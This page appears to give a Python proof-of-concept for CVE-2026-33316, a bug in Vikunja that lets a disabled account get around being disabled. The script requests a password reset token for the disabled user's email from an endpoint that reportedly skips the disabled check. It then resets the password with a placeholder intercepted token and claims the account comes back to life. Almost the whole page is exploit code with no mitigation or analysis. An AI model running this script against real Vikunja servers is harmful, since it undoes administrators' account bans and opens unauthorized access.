CVE-2026-33316 Vikunja账户禁用绕过漏洞

import requests # Target URL base_url = "http://target-vikunja-instance.com" email = "[email protected]" new_password = "NewStrongPassword123!" # Step 1: Request a password reset token # This endpoint does not check if the user is disabled token_endpoint = f"{base_url}/api/v1/user/password/token" reset_endpoint = f"{base_url}/api/v1/user/password/reset" payload_token = {"email": email} response = requests.post(token_endpoint, json=payload_token) if response.status_code == 200: print("[+] Reset token requested successfully.") # In a real scenario, the attacker would retrieve the token from the email link # For PoC purposes, assuming we intercepted the token reset_token = "INTERCEPTED_TOKEN_FROM_EMAIL" # Step 2: Reset the password using the token payload_reset = { "token": reset_token, "new_password": new_password } response_reset = requests.post(reset_endpoint, json=payload_reset) if response_reset.status_code == 200: print("[+] Password reset successful. Account is now active.") else: print("[-] Password reset failed.") else: print("[-] Failed to request token.")